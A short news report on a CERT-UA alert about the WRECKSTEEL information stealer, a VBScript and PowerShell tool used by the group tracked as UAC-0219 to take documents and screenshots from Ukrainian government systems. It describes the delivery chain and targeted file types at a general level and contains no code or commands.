The Ukrainian Government's Computer Emergency Response Team (CERT-UA) has issued an alert regarding a series of cyberattacks targeting critical government agencies and infrastructure to collect and steal sensitive information from compromised systems using an information stealer called ‘WRECKSTEEL.’ The malware, written in VBScript and PowerShell, is designed specifically for file exfiltration and espionage purposes.
CERT-UA has reported at least three distinct cyber incidents during the month, where attackers leveraged compromised user accounts to distribute malicious emails. These emails contained links to public file-sharing services such as DropMeFiles and Google Drive, sometimes embedded in PDF attachments. Clicking on these links triggered the download and execution of a VBScript loader, which in turn executed a PowerShell script.
The purpose of the PowerShell script is to search for and exfiltrate specific file types from the infected systems. These files include documents (.doc, .txt, .docx, .xls, .xlsx, .pdf, .rtf, .odt, .csv, .ods), presentations (.ppt, .pptx), and images (.png, .jpg, .jpeg). Additionally, the malware captures screenshots of the infected system.
Further investigation into the cyber threat revealed that this activity has been ongoing since at least the fall of 2024. During attacks throughout 2024, cybercriminals utilized EXE files created with the NSIS installer. The files contained decoy documents (PDF, JPG) and a VBScript stealer, alongside the use of the "IrfanView" image editor to capture screenshots.
Starting in 2025, the functionality to capture screenshots has been integrated directly into the PowerShell script, enhancing the malware’s capabilities.
CERT-UA tracks this activity as UAC-0219.
